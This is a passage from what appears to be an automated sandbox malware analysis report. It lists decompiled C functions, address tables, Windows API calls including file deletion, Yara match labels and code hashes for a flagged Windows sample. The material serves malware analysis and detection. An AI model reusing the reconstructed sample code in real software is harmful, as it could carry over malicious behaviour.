                                                                                                                                                                        					 *0x40e4b0(_a8);
                                                                                                                                                                        					 *0x40e4a4(_v8);
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				}
                                                                                                                                                                        			}





























                                                                                                                                                                        0x00407220
                                                                                                                                                                        0x00407222
                                                                                                                                                                        0x004073c0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004073c0
                                                                                                                                                                        0x00407235
                                                                                                                                                                        0x00407242
                                                                                                                                                                        0x00407253
                                                                                                                                                                        0x0040725c
                                                                                                                                                                        0x0040725e
                                                                                                                                                                        0x00407263
                                                                                                                                                                        0x00407268
                                                                                                                                                                        0x004073ab
                                                                                                                                                                        0x004073ac
                                                                                                                                                                        0x004073b2
                                                                                                                                                                        0x004073b3
                                                                                                                                                                        0x004073ba
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004073ba
                                                                                                                                                                        0x00407274
                                                                                                                                                                        0x00407276
                                                                                                                                                                        0x00407277
                                                                                                                                                                        0x0040727c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407282
                                                                                                                                                                        0x0040728a
                                                                                                                                                                        0x0040728b
                                                                                                                                                                        0x00407292
                                                                                                                                                                        0x00407389
                                                                                                                                                                        0x0040738a
                                                                                                                                                                        0x00407392
                                                                                                                                                                        0x00407395
                                                                                                                                                                        0x00407395
                                                                                                                                                                        0x0040739d
                                                                                                                                                                        0x004073a0
                                                                                                                                                                        0x004073a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004073a8
                                                                                                                                                                        0x00407298
                                                                                                                                                                        0x004072ae
                                                                                                                                                                        0x004072b0
                                                                                                                                                                        0x004072b5
                                                                                                                                                                        0x00407361
                                                                                                                                                                        0x00407361
                                                                                                                                                                        0x00407364
                                                                                                                                                                        0x0040736f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004072db
                                                                                                                                                                        0x004072e5
                                                                                                                                                                        0x004072e7
                                                                                                                                                                        0x004072f2
                                                                                                                                                                        0x004072f5
                                                                                                                                                                        0x004072fd
                                                                                                                                                                        0x00407300
                                                                                                                                                                        0x00407303
                                                                                                                                                                        0x0040730b
                                                                                                                                                                        0x00407312
                                                                                                                                                                        0x00407317
                                                                                                                                                                        0x0040731f
                                                                                                                                                                        0x00407321
                                                                                                                                                                        0x00407326
                                                                                                                                                                        0x00407329
                                                                                                                                                                        0x00407335
                                                                                                                                                                        0x0040733c
                                                                                                                                                                        0x00407341
                                                                                                                                                                        0x00407349
                                                                                                                                                                        0x0040734b
                                                                                                                                                                        0x00407350
                                                                                                                                                                        0x00407358
                                                                                                                                                                        0x0040735f
                                                                                                                                                                        0x0040735f
                                                                                                                                                                        0x00407335
                                                                                                                                                                        0x0040730b
                                                                                                                                                                        0x00407378
                                                                                                                                                                        0x00407381
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004072bb
                                                                                                                                                                        0x004072bc
                                                                                                                                                                        0x004072c5
                                                                                                                                                                        0x004072ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004072d5

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004072BC
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?), ref: 0040738A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407395
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004073A0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004073AC
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 004073B3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004073BA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2194112602-0
                                                                                                                                                                        • Opcode ID: 5a4f429bb92c1425083624027269dac2f6f66512f29d3a46626db28773defc43
                                                                                                                                                                        • Instruction ID: e8c6905146b6e6fcb6e5b83ffe865c27a3063a5e14c3c7fc069cf135c206e258
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a4f429bb92c1425083624027269dac2f6f66512f29d3a46626db28773defc43
                                                                                                                                                                        • Instruction Fuzzy Hash: 17419431504110AFEB099F66EE85E6E37B5EF44320F104839FD15FB2A0DB78A921DB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __inc$__mbtowc_l__un_inc
                                                                                                                                                                        • String ID: ${
                                                                                                                                                                        • API String ID: 579247601-4046706400
                                                                                                                                                                        • Opcode ID: dc69d8516cc11fe7fadc67670a898c0b1153202439d2a7f05566148b15abe76a
                                                                                                                                                                        • Instruction ID: 1055374d518e5f5b73a788cd124758a6c5e3ef42acecea30e9f68282066d24a0
                                                                                                                                                                        • Opcode Fuzzy Hash: dc69d8516cc11fe7fadc67670a898c0b1153202439d2a7f05566148b15abe76a
                                                                                                                                                                        • Instruction Fuzzy Hash: E541E4B0E01368DFCF24DB95E8846EEB7B1AF54304F54829AD41A67313D6389A80CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                        • String ID: '$0$9
                                                                                                                                                                        • API String ID: 3120068967-269856862
                                                                                                                                                                        • Opcode ID: d65ada69c6f0448e455e8efc2762e98b2572393252772e8e5edb01c5ee491a82
                                                                                                                                                                        • Instruction ID: ef80cffb82c7ee0d620c241a3dff5ded7c6569a569e687b7e648e20a43cd6067
                                                                                                                                                                        • Opcode Fuzzy Hash: d65ada69c6f0448e455e8efc2762e98b2572393252772e8e5edb01c5ee491a82
                                                                                                                                                                        • Instruction Fuzzy Hash: 4741E571D06229DFDB64CF58D8A9BAEB7B5FB48304F1486EAD008A7240C7399E85CF45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428B92
                                                                                                                                                                          • Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428BB9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _cmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2028851527-0
                                                                                                                                                                        • Opcode ID: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
                                                                                                                                                                        • Instruction ID: 09e779532c7962625a25b6a3118f594af604480c47d30444c376482f5ac8ff98
                                                                                                                                                                        • Opcode Fuzzy Hash: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
                                                                                                                                                                        • Instruction Fuzzy Hash: ED313371A02118EFCB04DFBCEA489AD7B75AB40305F91C15EF449AB209DE38AF45DB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 0042894E
                                                                                                                                                                          • Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428975
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _cmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2028851527-0
                                                                                                                                                                        • Opcode ID: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
                                                                                                                                                                        • Instruction ID: 9c2e0ac5a81b51015fbc54fc562c241c41ef6e53ee4f6753c511bf4ecc86f314
                                                                                                                                                                        • Opcode Fuzzy Hash: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
                                                                                                                                                                        • Instruction Fuzzy Hash: A9317471A02118EFCB04EFBCEA48AAD7B75AB40305F91815EE449B7205DE38EF41DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __inc$__hextodec__un_inc_isdigit_isxdigit
                                                                                                                                                                        • String ID: 0$p
                                                                                                                                                                        • API String ID: 500523077-2059906072
                                                                                                                                                                        • Opcode ID: b0356fd5653e0a6f6e224d2ad77bfed6b82b230c62960876a50289a7ee23f875
                                                                                                                                                                        • Instruction ID: a3020a5fbde0ace490a1d92676205228b3d3f57a385478ac9b20bcf3b838cca1
                                                                                                                                                                        • Opcode Fuzzy Hash: b0356fd5653e0a6f6e224d2ad77bfed6b82b230c62960876a50289a7ee23f875
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D4154B4E052798BCF25CFA5E8943EEBBF1AF55308F64819BC41966203D2395A81CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                        • String ID: 0$9
                                                                                                                                                                        • API String ID: 3120068967-1975997740
                                                                                                                                                                        • Opcode ID: 41ba9041e073bb15ec53c3d68c0243438a2683b8a4d8a65e34a2c78bd0c82506
                                                                                                                                                                        • Instruction ID: 17c75193d5e66341643ac04ad05f83e29f20ddbe34abb2b5208df055b995ecf8
                                                                                                                                                                        • Opcode Fuzzy Hash: 41ba9041e073bb15ec53c3d68c0243438a2683b8a4d8a65e34a2c78bd0c82506
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E41F571D06229DFDB64CF48D8A9BAEB7B5FB49304F5086AAD008A7240C7395E85CF45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                        • String ID: '$9
                                                                                                                                                                        • API String ID: 3120068967-1823400153
                                                                                                                                                                        • Opcode ID: e8478181fbcf0d97f5aaa5d4289ea9646e2b5478815b3089824e4077cb9ac537
                                                                                                                                                                        • Instruction ID: 33966614cb291029f0c7f667bd4cfbcc9821d282900e84767b526b2402c629c4
                                                                                                                                                                        • Opcode Fuzzy Hash: e8478181fbcf0d97f5aaa5d4289ea9646e2b5478815b3089824e4077cb9ac537
                                                                                                                                                                        • Instruction Fuzzy Hash: 694135B0E002299FDB24CF48C841BAEB7B5FF89314F1051AAD148AB251C3389E81CF1A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __hextodec__inc_isxdigit
                                                                                                                                                                        • String ID: +$p
                                                                                                                                                                        • API String ID: 3003077261-1790238857
                                                                                                                                                                        • Opcode ID: d5f280f2fa3220834aed4b8a45a1ba7957958c050bee697402ae40ae9c2d1f26
                                                                                                                                                                        • Instruction ID: 70ae99dea26e9fda4ea79188d22675bc92693f72982ea39d00ca0f601ce3ed33
                                                                                                                                                                        • Opcode Fuzzy Hash: d5f280f2fa3220834aed4b8a45a1ba7957958c050bee697402ae40ae9c2d1f26
                                                                                                                                                                        • Instruction Fuzzy Hash: B33150B0E052A98BCF25CFA5D8543EEBBB1AF15308F5441DBC41966203D2795A81CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __set_error_mode
                                                                                                                                                                        • String ID: jjj$t/j$SN
                                                                                                                                                                        • API String ID: 167136767-292791468
                                                                                                                                                                        • Opcode ID: 0f3f3eb1433c1d13d63198b302bc914cf58cc9f7b1ed1b0aa788c9b33ad61992
                                                                                                                                                                        • Instruction ID: 72bc7d515c62c63b3c953949aec6e500fbe1c61f3963da58caf0db55085d0050
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f3f3eb1433c1d13d63198b302bc914cf58cc9f7b1ed1b0aa788c9b33ad61992
                                                                                                                                                                        • Instruction Fuzzy Hash: D321F474A40108FBDB20CF44E995BEE33B5AB05314F60453AE40A922E2D3399F97DA89
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                        			E0040A2AA(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr* _v20;
                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                        
                                                                                                                                                                        				_t25 =  *0x40e1b8; // 0x6d5c58
                                                                                                                                                                        				_v12 = _t25;
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                        				_t29 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(__ecx) * 2);
                                                                                                                                                                        				_t54 = _v16;
                                                                                                                                                                        				_t52 = _t29;
                                                                                                                                                                        				_t30 = 2;
                                                                                                                                                                        				_t76 =  ==  ? _t30 : 0;
                                                                                                                                                                        				_t77 = ( ==  ? _t30 : 0) + _t54;
                                                                                                                                                                        				if(_t77 != 0) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t39 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(_t54) * 2);
                                                                                                                                                                        						_v8 = _t39;
                                                                                                                                                                        						_t82 =  *((intOrPtr*)( *0x40e18c))(_t77,  *0x40e258);
                                                                                                                                                                        						if(_t82 == 0) {
                                                                                                                                                                        							if(_a4 == 0) {
                                                                                                                                                                        								_push(_t77);
                                                                                                                                                                        								if(E0040A3E4(_t77,  &_v8, 0,  *((intOrPtr*)( *0x40e08c))()) != 0) {
                                                                                                                                                                        									_t47 = E0040A503(_t52, _v12);
                                                                                                                                                                        									_t70 = _v8;
                                                                                                                                                                        									goto L9;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t47 = E0040A503(_t52, _v12);
                                                                                                                                                                        								_t70 = _a4;
                                                                                                                                                                        								L9:
                                                                                                                                                                        								_t52 = E0040A503(_t47, _t70);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t83 = _v20;
                                                                                                                                                                        							 *_t83 =  *((intOrPtr*)( *0x40e13c))( *_t83, _t52);
                                                                                                                                                                        							_t77 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t85 = _t82 - _t77 >> 1;
                                                                                                                                                                        							if(E0040A3E4(_t77,  &_v8, 0, _t85) != 0) {
                                                                                                                                                                        								_t52 = E0040A503(E0040A503(_t52, _v12), _v8);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t77 = _t77 + _t85 * 2 + 2;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						_t54 = _v16;
                                                                                                                                                                        					} while (_t77 != 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t80 = _v20;
                                                                                                                                                                        				 *_t80 =  *((intOrPtr*)( *0x40e13c))( *_t80, _t52);
                                                                                                                                                                        				LocalFree(_t52);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}




















                                                                                                                                                                        0x0040a2b0
                                                                                                                                                                        0x0040a2be
                                                                                                                                                                        0x0040a2c7
                                                                                                                                                                        0x0040a2ca
                                                                                                                                                                        0x0040a2d9
                                                                                                                                                                        0x0040a2db
                                                                                                                                                                        0x0040a2e2
                                                                                                                                                                        0x0040a2e4
                                                                                                                                                                        0x0040a2e9
                                                                                                                                                                        0x0040a2ec
                                                                                                                                                                        0x0040a2ee
                                                                                                                                                                        0x0040a2f4
                                                                                                                                                                        0x0040a30c
                                                                                                                                                                        0x0040a31b
                                                                                                                                                                        0x0040a320
                                                                                                                                                                        0x0040a324
                                                                                                                                                                        0x0040a35f
                                                                                                                                                                        0x0040a375
                                                                                                                                                                        0x0040a389
                                                                                                                                                                        0x0040a390
                                                                                                                                                                        0x0040a395
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a395
                                                                                                                                                                        0x0040a361
                                                                                                                                                                        0x0040a366
                                                                                                                                                                        0x0040a36b
                                                                                                                                                                        0x0040a398
                                                                                                                                                                        0x0040a39f
                                                                                                                                                                        0x0040a39f
                                                                                                                                                                        0x0040a3a1
                                                                                                                                                                        0x0040a3ae
                                                                                                                                                                        0x0040a3b0
                                                                                                                                                                        0x0040a326
                                                                                                                                                                        0x0040a32b
                                                                                                                                                                        0x0040a33b
                                                                                                                                                                        0x0040a351
                                                                                                                                                                        0x0040a351
                                                                                                                                                                        0x0040a356
                                                                                                                                                                        0x0040a356
                                                                                                                                                                        0x0040a3b5
                                                                                                                                                                        0x0040a3bb
                                                                                                                                                                        0x0040a3be
                                                                                                                                                                        0x0040a2f4
                                                                                                                                                                        0x0040a3c6
                                                                                                                                                                        0x0040a3d4
                                                                                                                                                                        0x0040a3d6
                                                                                                                                                                        0x0040a3e3

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A2D9
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A30C
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?), ref: 0040A3B5
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040A3D6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree$lstrlen$Global
                                                                                                                                                                        • String ID: X\m
                                                                                                                                                                        • API String ID: 1425192967-3101927847
                                                                                                                                                                        • Opcode ID: 16cf261d91fc909ca7edb2e35f5703406e063cb1cbf4963b31a85fac73282971
                                                                                                                                                                        • Instruction ID: 8d9fe808253cfd760579b52592682b105d53dbc0a4ab2c38afac3778b4664aea
                                                                                                                                                                        • Opcode Fuzzy Hash: 16cf261d91fc909ca7edb2e35f5703406e063cb1cbf4963b31a85fac73282971
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A419572A00314EFDB14DFA5DD81AAE77B5EB88310F10497AE941B7390DBB89D20CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                        • String ID: 9
                                                                                                                                                                        • API String ID: 3120068967-2366072709
                                                                                                                                                                        • Opcode ID: 11e6684635529dbad8d35b36eef148a8965c2c1dbfdad4b443329b555f114060
                                                                                                                                                                        • Instruction ID: f0591ccac9ef110b670dbafa2154f0458bff898d973b6b25682ed3c2d09e6541
                                                                                                                                                                        • Opcode Fuzzy Hash: 11e6684635529dbad8d35b36eef148a8965c2c1dbfdad4b443329b555f114060
                                                                                                                                                                        • Instruction Fuzzy Hash: 1B4125B0E102299FDB24CF48C841BAEB7B5FF89314F1051AAD149AB251C7389E85CF5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                        • String ID: 9
                                                                                                                                                                        • API String ID: 3120068967-2366072709
                                                                                                                                                                        • Opcode ID: 6e911fc6991dbc0dd141f8c46212a9eaaa5899a69abeb8a2316d7e632b1c436b
                                                                                                                                                                        • Instruction ID: 5b1078cb3ae15d9e769b38bd35f864cbac34573bdd3023a4d8c32d9638b75aed
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e911fc6991dbc0dd141f8c46212a9eaaa5899a69abeb8a2316d7e632b1c436b
                                                                                                                                                                        • Instruction Fuzzy Hash: D44116B1E1012A9FEF24CF48C981BAEB7B5FF89314F1051AAD149AB251C7385E85CF19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                        • String ID: 9
                                                                                                                                                                        • API String ID: 3120068967-2366072709
                                                                                                                                                                        • Opcode ID: 6b6ddc622a056617a5856230ff7480f80a991bdd0847e8647f113bc0b4bb191c
                                                                                                                                                                        • Instruction ID: 835cfe15b476ae8e4793af6b9a4f30a0ff4c6f9aecd7600ab4d96fd8f35f6e68
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b6ddc622a056617a5856230ff7480f80a991bdd0847e8647f113bc0b4bb191c
                                                                                                                                                                        • Instruction Fuzzy Hash: C441E671D01229DFDB64CF48DCA9BAEB7B5FB48300F1086AAD008A7240C7395E84CF44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                                                        • String ID: 9
                                                                                                                                                                        • API String ID: 2124759748-2366072709
                                                                                                                                                                        • Opcode ID: 1e2721535cc656cbde0337daf3e84c73702726f3bb7acc712b66a0e9bb19ac73
                                                                                                                                                                        • Instruction ID: 4f6c0f0e4c96b38d0cba1ee8cb67c5684d1908fa339e2039248adde2d440ae71
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e2721535cc656cbde0337daf3e84c73702726f3bb7acc712b66a0e9bb19ac73
                                                                                                                                                                        • Instruction Fuzzy Hash: 864106B1E001299FDB24CF48C981BAEB7B5FF89314F1051EAE149AB251C7385E81CF1A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                                                        • String ID: 9
                                                                                                                                                                        • API String ID: 2124759748-2366072709
                                                                                                                                                                        • Opcode ID: 8050f4bc507ec0bb941bc43ca6d5d4e1f6f56b66609b99a9966d1b80a37584e8
